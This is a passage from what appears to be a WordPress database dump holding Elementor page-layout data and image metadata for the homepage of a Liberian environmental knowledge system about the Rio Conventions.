,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5896,530,'_elementor_version','2.7.5'),(5897,530,'_elementor_template_type','wp-page'),(5900,531,'_wp_attached_file','2019/11/featured_cbd.jpg'),(5901,531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:554;s:4:\"file\";s:24:\"2019/11/featured_cbd.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_cbd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_cbd-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_cbd-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"RD1006\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1451687431\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5909,533,'_wp_page_template','default'),(5910,533,'_elementor_edit_mode','builder'),(5911,533,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5912,533,'_elementor_version','2.7.5'),(5913,533,'_elementor_template_type','wp-page'),(5917,534,'_wp_page_template','default'),(5918,534,'_elementor_edit_mode','builder'),(5919,534,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center 